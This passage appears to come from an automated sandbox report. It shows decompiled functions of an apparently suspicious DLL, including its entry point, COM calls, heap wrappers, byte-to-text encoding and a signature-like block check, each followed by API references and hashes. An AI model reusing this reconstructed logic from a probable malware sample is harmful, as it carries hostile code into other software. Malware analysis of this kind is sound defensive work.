				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04615C35(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x461a2d4; // 0xdad5a8
						_t20 = _t68 + 0x461b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E046137AF(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                0x04616878
                                0x0461687b
                                0x0461688b
                                0x04616894
                                0x04616898
                                0x04616966
                                0x0461696c
                                0x0461696c
                                0x046168b2
                                0x046168b7
                                0x046168bb
                                0x046168c1
                                0x046168c6
                                0x046168cd
                                0x046168dc
                                0x046168dc
                                0x046168e0
                                0x046168e2
                                0x046168ee
                                0x046168f9
                                0x04616904
                                0x04616908
                                0x04616912
                                0x04616916
                                0x04616918
                                0x0461691d
                                0x04616924
                                0x04616934
                                0x04616934
                                0x0461691d
                                0x04616916
                                0x04616936
                                0x0461693b
                                0x04616940
                                0x04616940
                                0x04616946
                                0x0461694c
                                0x04616951
                                0x04616951
                                0x04616956
                                0x0461695b
                                0x0461695b
                                0x04616956
                                0x046168e0
                                0x0461695d
                                0x04616963
                                0x00000000

                                APIs
                                  • Part of subcall function 04615C35: SysAllocString.OLEAUT32(80000002), ref: 04615C8C
                                  • Part of subcall function 04615C35: SysFreeString.OLEAUT32(00000000), ref: 04615CF1
                                • SysFreeString.OLEAUT32(?), ref: 04616951
                                • SysFreeString.OLEAUT32(04611E05), ref: 0461695B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 277c197456a1b8108afc7d9d74157edbc94fb639fb28d6e16cd7462c279ba708
                                • Instruction ID: c1195bd2986af83562b2f87d1a1a429b7a3d3f285d07a45e582999fd17ec4144
                                • Opcode Fuzzy Hash: 277c197456a1b8108afc7d9d74157edbc94fb639fb28d6e16cd7462c279ba708
                                • Instruction Fuzzy Hash: 0B314B7650011AEFCB21DF64C988C9BBBB9FFC97407184A59F8199B220E331ED51CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046143C0, Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E046143C0(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x461a2d4; // 0xdad5a8
				_t2 = _t42 + 0x461b438; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x461a2d4; // 0xdad5a8
					_t6 = _t45 + 0x461b458; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x461a2d4; // 0xdad5a8
							_t30 = _v8;
							_t12 = _t48 + 0x461b448; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                0x046143cc
                                0x046143cd
                                0x046143d3
                                0x046143da
                                0x046143dc
                                0x046143e0
                                0x046143e4
                                0x046143e6
                                0x046143ef
                                0x046143f5
                                0x046143fd
                                0x046143ff
                                0x04614403
                                0x04614405
                                0x04614412
                                0x04614416
                                0x0461441b
                                0x04614421
                                0x04614426
                                0x0461442e
                                0x04614430
                                0x04614432
                                0x04614438
                                0x04614438
                                0x0461443b
                                0x04614441
                                0x04614441
                                0x04614444
                                0x0461444a
                                0x0461444a
                                0x04614451

                                APIs
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 046143FD
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 0461442E
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Interface_ProxyQueryUnknown_
                                • String ID:
                                • API String ID: 2522245112-0
                                • Opcode ID: 13d0180fad9f830ef5a0681d5ecf9976d0b70165d53c1cfa290eb7953d90c417
                                • Instruction ID: e7495871956ca487ec6016de15d01e6b9418b35973cfffd4a77659fbbb6198db
                                • Opcode Fuzzy Hash: 13d0180fad9f830ef5a0681d5ecf9976d0b70165d53c1cfa290eb7953d90c417
                                • Instruction Fuzzy Hash: 5B211275A00619EFCB00DFA4C444D9AB779EFC9704B188698E905DB325EA35ED41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04612EE0, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04612F08
                                  • Part of subcall function 04616872: SysFreeString.OLEAUT32(?), ref: 04616951
                                • SafeArrayDestroy.OLEAUT32(?), ref: 04612F55
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ArraySafe$CreateDestroyFreeString
                                • String ID:
                                • API String ID: 3098518882-0
                                • Opcode ID: b9ed8df902ec17a6c1e37ad0dcd2fe46c9fe61a8e3c63372b71caf52850bdf94
                                • Instruction ID: e450c931595bc5fb43a8c9f6a53c64e13466bcbfff4b11a1ffde5462f712626c
                                • Opcode Fuzzy Hash: b9ed8df902ec17a6c1e37ad0dcd2fe46c9fe61a8e3c63372b71caf52850bdf94
                                • Instruction Fuzzy Hash: 47115272A00109BFDB01DFA8CC44ADEB7B8EF04710F098065FA14E6171E375AA15DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046174B6, Relevance: 3.0, APIs: 2, Instructions: 47memorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E046174B6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t15;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E04614AA6(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E04616304(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E04615F2A(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x461a290, 0, _t23);
				}
				return _t20;
			}










                                0x046174b6
                                0x046174c7
                                0x046174cb
                                0x04617524
                                0x046174cd
                                0x046174d4
                                0x046174da
                                0x046174de
                                0x046174e3
                                0x046174e7
                                0x046174ed
                                0x046174fd
                                0x0461750f
                                0x0461750f
                                0x0461751a
                                0x0461751a
                                0x0461752b

                                APIs
                                  • Part of subcall function 04614AA6: lstrlen.KERNEL32(?,00000000,053C9C98,74ECC740,046113D0,053C9E9D,046155DE,046155DE,?,046155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04614AAD
                                  • Part of subcall function 04614AA6: mbstowcs.NTDLL ref: 04614AD6
                                  • Part of subcall function 04614AA6: memset.NTDLL ref: 04614AE8
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,75145520,00000008,00000014,004F0053,053C92FC), ref: 046174ED
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,75145520,00000008,00000014,004F0053,053C92FC), ref: 0461751A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID:
                                • API String ID: 1500278894-0
                                • Opcode ID: 5d1b54a0a028bcc437201b72944bdc34205fa5b1e1e41493044deac3094968cd
                                • Instruction ID: a793b5c2527f65f4652528645baa50cd1f09a44346be7bb895f7dfd32680270f
                                • Opcode Fuzzy Hash: 5d1b54a0a028bcc437201b72944bdc34205fa5b1e1e41493044deac3094968cd
                                • Instruction Fuzzy Hash: BC01AD32200209BBEB216FA4DC44E9A7BB9FF84715F144029FA4596170FBB1ED29CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046117B0, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(04614106), ref: 046117CA
                                  • Part of subcall function 04616872: SysFreeString.OLEAUT32(?), ref: 04616951
                                • SysFreeString.OLEAUT32(00000000), ref: 0461180A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: e920ea61807905bff53d71d8f4fd07a365c3dcb85c31816f1b94a0f5a462fc2c
                                • Instruction ID: 236dc0a7240eca176e7200b055a0e806099d0557a24a8760bd0d1d6b4d875460
                                • Opcode Fuzzy Hash: e920ea61807905bff53d71d8f4fd07a365c3dcb85c31816f1b94a0f5a462fc2c
                                • Instruction Fuzzy Hash: CF014F7661110ABFDB519F68D80899F7BB9EF48710B088025FA05A6230F774ED19DBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04615685, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x461a294) == 0) {
						E04615076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x461a294) == 1) {
						_t10 = E04616B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







                                0x0461568c
                                0x0461568d
                                0x04615690
                                0x046156c2
                                0x046156c4
                                0x046156c4
                                0x04615692
                                0x04615693
                                0x046156a8
                                0x046156af
                                0x046156b1
                                0x046156b1
                                0x046156af
                                0x04615693
                                0x046156cc

                                APIs
                                • InterlockedIncrement.KERNEL32(0461A294), ref: 0461569A
                                  • Part of subcall function 04616B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04616B24
                                • InterlockedDecrement.KERNEL32(0461A294), ref: 046156BA
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: 862e79c8ced2afd5ca1a0c4cc3851a81f4323c75486a36c2f152ac63c1aa8fe6
                                • Instruction ID: e028ebd8514c4db31998a635f0a9cd12e2cad8349080ea0ca1da067bb18e5321
                                • Opcode Fuzzy Hash: 862e79c8ced2afd5ca1a0c4cc3851a81f4323c75486a36c2f152ac63c1aa8fe6
                                • Instruction Fuzzy Hash: D9E04F39304332779B226EA49908B9EE650ABA1BC5B0C8418B483D1138F714F850C6E5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04616176, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 92%
                                			E04616176(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x461a290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                0x0461617b
                                0x04616180
                                0x0461618e
                                0x04616194
                                0x04616198
                                0x04616209
                                0x0461619a
                                0x0461619e
                                0x046161a1
                                0x046161a4
                                0x046161ab
                                0x046161ac
                                0x046161ad
                                0x046161b1
                                0x046161b4
                                0x046161bb
                                0x046161c1
                                0x046161c2
                                0x046161c2
                                0x046161c9
                                0x046161ca
                                0x046161cb
                                0x046161cf
                                0x046161db
                                0x046161e1
                                0x046161e2
                                0x046161e2
                                0x046161e4
                                0x046161ea
                                0x046161ec
                                0x046161f1
                                0x046161f2
                                0x046161f2
                                0x046161f8
                                0x04616201
                                0x04616203
                                0x04616206
                                0x04616215

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0461618E
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 4a59fa65a83504c62bde7dd1511e6e8b0d0891ba6e23bc74eaaf54d6895c858a
                                • Instruction ID: 18d413103840073714e86cd40bcdcb7d91ea4c99baf5640a5992fbca5017fe82
                                • Opcode Fuzzy Hash: 4a59fa65a83504c62bde7dd1511e6e8b0d0891ba6e23bc74eaaf54d6895c858a
                                • Instruction Fuzzy Hash: 2A11E9752863449FEB068F2DD852BE97BA5DB63358F18508EE4408B3A3D27B950BC760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04614576, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule
                                C-Code - Quality: 34%
                                			E04614576(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x461a2d4; // 0xdad5a8
				_t4 = _t15 + 0x461b390; // 0x53c8938
				_t20 = _t4;
				_t6 = _t15 + 0x461b124; // 0x650047
				_t17 = E04616872(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04613875(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                0x04614580
                                0x04614582
                                0x04614589
                                0x0461458a
                                0x0461458b
                                0x0461458c
                                0x04614592
                                0x04614597
                                0x04614597
                                0x046145a1
                                0x046145b3
                                0x046145ba
                                0x046145e9
                                0x046145bc
                                0x046145c1
                                0x046145e6
                                0x046145c3
                                0x046145c6
                                0x046145cd
                                0x046145d8
                                0x046145cf
                                0x046145d2
                                0x046145d2
                                0x046145dc
                                0x046145dc
                                0x046145c1
                                0x046145f0

                                APIs
                                  • Part of subcall function 04616872: SysFreeString.OLEAUT32(?), ref: 04616951
                                  • Part of subcall function 04613875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,046171C8,004F0053,00000000,?), ref: 0461387E
                                  • Part of subcall function 04613875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,046171C8,004F0053,00000000,?), ref: 046138A8
                                  • Part of subcall function 04613875: memset.NTDLL ref: 046138BC
                                • SysFreeString.OLEAUT32(00000000), ref: 046145DC
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: a0a4f95373800f451e7b551cb710f8c6f9150f85b135504149898c5dd4c003e0
                                • Instruction ID: 055ee48b97c6a9e3a443230d0332a3ba6edc08542ae4f6b914f922b9f29b441b
                                • Opcode Fuzzy Hash: a0a4f95373800f451e7b551cb710f8c6f9150f85b135504149898c5dd4c003e0
                                • Instruction Fuzzy Hash: D5015E35600029BFDB119FA4CC449AEBBB9FB08754F08452AE906E7130FB70AD66D7A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04611CEF, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 89%
                                			E04611CEF(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E04616176(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x461a2d4; // 0xdad5a8
						_t9 = _t17 + 0x461b9d4; // 0x444f4340
						_t20 = E04612F68( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x461a290, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                0x04611cf2
                                0x04611cf8
                                0x04611d4f
                                0x04611cfe
                                0x04611d09
                                0x04611d0e
                                0x04611d12
                                0x04611d1f
                                0x04611d27
                                0x04611d33
                                0x04611d3b
                                0x04611d45
                                0x04611d45
                                0x04611d12
                                0x04611d54

                                APIs
                                  • Part of subcall function 04616176: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0461618E
                                  • Part of subcall function 04612F68: lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04612F9C
                                  • Part of subcall function 04612F68: StrStrA.SHLWAPI(00000000,?), ref: 04612FA9
                                  • Part of subcall function 04612F68: RtlAllocateHeap.NTDLL(00000000,?), ref: 04612FC8
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,04616792), ref: 04611D45
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$Allocate$Freelstrlen
                                • String ID:
                                • API String ID: 2220322926-0
                                • Opcode ID: 4205b096a4b4c75805d5756009d228f3b754d98f21aaa2016f9862d816acbf34
                                • Instruction ID: e7a9bf1d924f13e78c95af0e655da33fb77e83a604d6181c5574bce1c531af77
                                • Opcode Fuzzy Hash: 4205b096a4b4c75805d5756009d228f3b754d98f21aaa2016f9862d816acbf34
                                • Instruction Fuzzy Hash: B8011976200508FFDB128F44DD40EEA7BB9EB59794F18802AFA0996670F731FA45DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04616837, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04616837(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x461a290, 0, _a4); // executed
				return _t2;
			}




                                0x04616843
                                0x04616849

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 6a343c93999ab1807d4bfdc3f1c5b68af2796781035d66e62aba5a0cd311f452
                                • Instruction ID: abf8efa47b7473ea5e462be8c1002ab66c0eefa50ad230b04b613e94cac55ff5
                                • Opcode Fuzzy Hash: 6a343c93999ab1807d4bfdc3f1c5b68af2796781035d66e62aba5a0cd311f452
                                • Instruction Fuzzy Hash: 2BB01271115100AFCB02CB50DE04F057B32F750B01F185016B20400070D23A0C20EB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046150CA, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E046150CA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x461a290, 0, _a4); // executed
				return _t2;
			}




                                0x046150d6
                                0x046150dc

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 5ff7636874a8f3a2895c0eade8ce1021467220e347cc60eeb80593fb4c2e01b5
                                • Instruction ID: 9184f2c8d299143cac9eb6a311455d5b45455c78b67259b16de62a2ea8a98206
                                • Opcode Fuzzy Hash: 5ff7636874a8f3a2895c0eade8ce1021467220e347cc60eeb80593fb4c2e01b5
                                • Instruction Fuzzy Hash: BCB012B1204100ABCB124B40DF04F057B32F750F01F095026B30800070D23A4C20FB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04612BE3, Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04612BE3(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E046156CF(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E04616837(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E046150CA(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E04613984(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E046139C5(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
